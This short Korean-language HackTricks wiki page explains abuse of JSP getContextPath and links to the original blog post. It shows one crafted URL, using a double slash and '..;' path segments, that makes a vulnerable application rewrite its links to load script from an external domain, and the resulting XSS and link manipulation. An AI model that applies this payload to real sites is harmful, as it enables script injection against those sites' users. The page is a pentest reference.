# JSP

{{#include ../../banners/hacktricks-training.md}}

## **getContextPath** 남용

정보는 [여기](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html)에서 확인할 수 있습니다.
```
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
```
해당 웹에 접근하면 모든 링크를 _**rakeshmane.com**_에 정보를 요청하도록 변경할 수 있습니다:

![](<../../images/image (326).png>)

{{#include ../../banners/hacktricks-training.md}}